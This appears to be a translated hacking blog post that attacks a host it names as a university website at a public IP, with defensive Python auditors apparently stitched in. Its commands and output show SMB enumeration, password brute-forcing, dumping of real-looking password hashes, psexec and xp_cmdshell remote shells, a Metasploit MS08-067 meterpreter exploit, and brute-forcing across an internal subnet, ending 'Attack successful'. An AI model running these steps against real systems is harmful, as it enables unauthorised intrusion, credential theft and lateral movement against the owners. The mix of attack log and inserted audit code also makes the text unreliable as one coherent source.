Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
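The smb-pwdump listing above is exactly the evidence a defender should be reviewing before anyone else does: two accounts with the empty-password marker in both fields and two accounts that still have LM hashes stored (Windows 2000 keeps LM hashes by default). The following is an added example, not code from the original post or from pwdump or Nmap: a small Python auditor that reads constructed lines in the same layout (all user names, RIDs and hash values made up for the example) and reports empty passwords, LM hashes still being stored, and a password shared between accounts. It does not crack anything; it only reads the markers and compares hash fields.

```python
"""Audit a pwdump-style hash listing for weak account settings.

Added example, not the original post's code: reads constructed lines in the
layout of nmap's smb-pwdump output (and plain pwdump "user:rid:LM:NT:::"
lines) and reports empty passwords, stored LM hashes and shared passwords.
"""
import re
from collections import defaultdict

# Constructed sample in the nmap smb-pwdump layout shown above; every user,
# RID and hash value here is made up for this example.
SAMPLE_DUMP = """\
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   svc_backup:1003 => 0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
|   test:1002 => 0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
|_  ops:1004 => NO PASSWORD*********************:89ABCDEF0123456789ABCDEF01234567
"""

# Accepts both the nmap form "| user:rid => LM:NT" and pwdump's "user:rid:LM:NT:::".
LINE_RE = re.compile(
    r"^\|?_?\s*(?P<user>[^:\s]+):(?P<rid>\d+)\s*(?:=>|:)\s*(?P<lm>[^:]+):(?P<nt>[^:]+)"
)


def is_empty(field):
    """pwdump prints a 'NO PASSWORD***' marker instead of a hash when the field
    holds the empty-password hash (for LM: when no LM hash is stored at all)."""
    return field.startswith("NO PASSWORD")


def parse_dump(text):
    """Return one dict per account line; lines that are not accounts are ignored."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            accounts.append({"user": m["user"], "rid": int(m["rid"]),
                             "lm": m["lm"].strip(), "nt": m["nt"].strip()})
    return accounts


def audit_accounts(accounts):
    """Return (severity, detail) findings for the listed accounts."""
    findings = []
    by_nt = defaultdict(list)  # NT hash -> accounts using it, to spot reuse
    for a in accounts:
        if is_empty(a["nt"]):
            who = "built-in Administrator" if a["rid"] == 500 else a["user"]
            findings.append(("high", f"{who} (RID {a['rid']}) has an empty password"))
        else:
            by_nt[a["nt"]].append(a["user"])
        if not is_empty(a["lm"]):
            findings.append(("medium", f"{a['user']} has an LM hash stored (LM hashing enabled)"))
    for users in by_nt.values():
        if len(users) > 1:
            findings.append(("medium", "same password shared by " + ", ".join(sorted(users))))
    return findings


if __name__ == "__main__":
    for severity, detail in audit_accounts(parse_dump(SAMPLE_DUMP)):
        print(f"[{severity}] {detail}")
```

The shared-password check works purely on equality of the NT field, so it needs no wordlist; the LM check matters because an LM hash is derived from a case-folded, 14-character-capped form of the password and is far weaker than the NT hash next to it, which is why disabling LM storage (NoLMHash) is the usual remediation.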

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
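Taken together, the host-script results in this post (smb-enum-users, smb-enum-shares, smb-brute and smb-check-vulns) describe four distinct weaknesses: an account list disclosed to an unauthenticated scan, a null session allowed on IPC$, logins accepted with a blank or guessable password, and a missing patch. A defender running the same scripts against their own estate wants those turned into findings rather than read by eye. The following is an added example, not code from the original post or from the Nmap project: a Python parser over a constructed nmap "normal output" report (placeholder host 192.0.2.10, made-up MAC and script results, laid out like the runs above) that extracts the per-script result lines and maps them to severity-tagged findings.

```python
"""Turn nmap SMB host-script output into an audit finding list.

Added example, not the original post's or Nmap's code: parses constructed
nmap "normal output" text and reports the weak SMB settings surfaced by
smb-enum-shares, smb-enum-users, smb-brute and smb-check-vulns.
"""
import re
from dataclasses import dataclass

# Constructed sample in the layout of the nmap runs above; host name,
# address, MAC and script results are all made up for this example.
SAMPLE_REPORT = """\
Nmap scan report for lab-host (192.0.2.10)
Host is up (0.00046s latency).
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
MAC Address: 08:00:27:00:00:01 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: LABDOMAIN; Users: Administrator, Guest, test
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
"""


@dataclass(frozen=True)
class Finding:
    severity: str  # "high" or "medium"
    check: str     # nmap script that produced the evidence
    detail: str


def parse_report(text):
    """Extract host address, open ports and per-script result lines."""
    host, ports, scripts = None, [], {}
    current, in_scripts = None, False
    for raw in text.splitlines():
        line = raw.rstrip()
        m = re.match(r"Nmap scan report for (\S+)(?: \((\S+)\))?", line)
        if m:
            host = m.group(2) or m.group(1)
            continue
        m = re.match(r"(\d+)/(?:tcp|udp)\s+open\s+(\S+)", line)
        if m:
            ports.append((int(m.group(1)), m.group(2)))
            continue
        if line.startswith("Host script results:"):
            in_scripts = True
            continue
        if not in_scripts:
            continue
        if not line.startswith("|"):
            in_scripts = False  # a line without the "|" gutter ends the block
            continue
        body = line[1:].lstrip("_").strip()  # drop the "|" / "|_" prefix
        header = re.fullmatch(r"([A-Za-z0-9-]+):", body)
        if header:
            current = header.group(1)
            scripts[current] = []
        elif current is not None and body:
            scripts[current].append(body)
    return {"host": host, "ports": ports, "scripts": scripts}


def audit(report):
    """Map script results to findings a hardening ticket could be raised from."""
    findings, s = [], report["scripts"]
    share = None
    for body in s.get("smb-enum-shares", []):
        m = re.match(r"Anonymous access:\s*(.+)", body)
        if m is None:
            share = body  # a bare line names the share the next line describes
        elif m.group(1) != "<none>" and share:
            findings.append(Finding("medium", "smb-enum-shares",
                                    f"anonymous {m.group(1)} access on share {share}"))
    for body in s.get("smb-enum-users", []):
        m = re.search(r"Users:\s*(.+)", body)
        if m:
            users = [u.strip() for u in m.group(1).split(",")]
            findings.append(Finding("medium", "smb-enum-users",
                                    f"{len(users)} account names disclosed without credentials: "
                                    + ", ".join(users)))
    for body in s.get("smb-brute", []):
        m = re.match(r"(\S+?):(\S*)\s*=> Login was successful", body)
        if m:
            kind = "blank password" if m.group(2) == "<blank>" else "guessable password"
            findings.append(Finding("high", "smb-brute", f"account {m.group(1)} has a {kind}"))
    for body in s.get("smb-check-vulns", []):
        m = re.match(r"([A-Za-z0-9-]+):\s*VULNERABLE", body)
        if m:
            findings.append(Finding("high", "smb-check-vulns", f"unpatched {m.group(1)}"))
    return findings


if __name__ == "__main__":
    report = parse_report(SAMPLE_REPORT)
    print(f"{report['host']}: open ports {[p for p, _ in report['ports']]}")
    for f in audit(report):
        print(f"[{f.severity}] {f.check}: {f.detail}")
```

The parser keys on nmap's "|" gutter and the "script-name:" header line, so the same loop handles any NSE script's output; only `audit` knows the four scripts' result formats. Feeding it the real output of an `nmap --script "smb-*"` run over a scan file (one report per host) gives a per-host list in which READ on IPC$ flags a null-session policy to tighten and a VULNERABLE line flags a patch to deploy.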

root@bt:~# msfconsole   // in msf, exploit the ms08-067 vulnerability against the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal subnet using the user names and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~